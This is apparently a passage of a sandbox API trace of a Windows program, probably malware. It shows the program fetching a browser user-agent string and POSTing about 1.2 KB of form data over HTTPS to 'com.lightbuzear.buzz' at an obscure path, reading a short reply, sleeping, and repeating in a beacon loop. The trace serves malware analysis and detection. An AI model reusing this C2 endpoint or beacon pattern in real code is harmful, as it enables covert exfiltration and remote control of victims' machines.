dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea90 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830d68 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0218.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b38 [0218.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0218.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b88 [0218.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0218.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0218.212] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0218.213] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0218.213] FreeLibrary (hLibModule=0x71780000) returned 1 [0218.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b88 | out: hHeap=0x4780000) returned 1 [0218.213] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0218.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e58 [0218.213] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0218.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0218.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ebe0 [0218.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0218.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0218.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b60 [0218.223] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0218.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0218.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0218.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0218.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0218.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebc8 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebf8 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebc8 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebf8 | out: hHeap=0x4780000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ebf8 [0218.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0218.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0218.225] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0218.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0218.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eac0 [0218.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0218.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e08 [0218.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0218.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e08 | out: hHeap=0x4780000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a20 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0218.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e08 [0218.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0218.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0218.227] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0218.227] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0218.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e08 | out: hHeap=0x4780000) returned 1 [0218.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0218.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830a48 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0218.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d18 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0218.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d68 [0218.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0218.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0218.229] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0218.329] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0219.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0219.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0219.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0219.393] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0219.393] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830c00 [0219.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0219.394] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0219.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c00 | out: hHeap=0x4780000) returned 1 [0219.394] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b88 [0219.394] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0219.394] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c28 [0219.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0219.395] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0219.395] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0219.395] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0219.395] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c28 | out: hHeap=0x4780000) returned 1 [0219.396] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0219.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0219.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0219.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0219.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830a48 [0219.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0219.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0219.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0219.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ca0 [0219.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0219.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a48 [0219.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0219.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0219.398] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0219.398] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0219.398] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0219.398] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0219.398] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0219.398] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0219.399] FreeLibrary (hLibModule=0x71570000) returned 1 [0219.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0219.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0219.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0219.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b60 | out: hHeap=0x4780000) returned 1 [0219.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e58 | out: hHeap=0x4780000) returned 1 [0219.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830bd8 | out: hHeap=0x4780000) returned 1 [0219.400] Sleep (dwMilliseconds=0x2710) [0219.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0219.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0219.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0219.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0219.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0219.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0219.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0219.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0219.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0219.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebc8 [0219.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0219.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebc8 | out: hHeap=0x4780000) returned 1 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eca0 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0219.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0219.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0219.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d68 [0219.426] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea90 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0219.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0219.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0219.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830a48 [0219.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0219.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a70 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0219.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c78 [0219.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0219.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0219.429] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0219.429] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0219.429] FreeLibrary (hLibModule=0x71780000) returned 1 [0219.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c78 | out: hHeap=0x4780000) returned 1 [0219.429] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0219.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 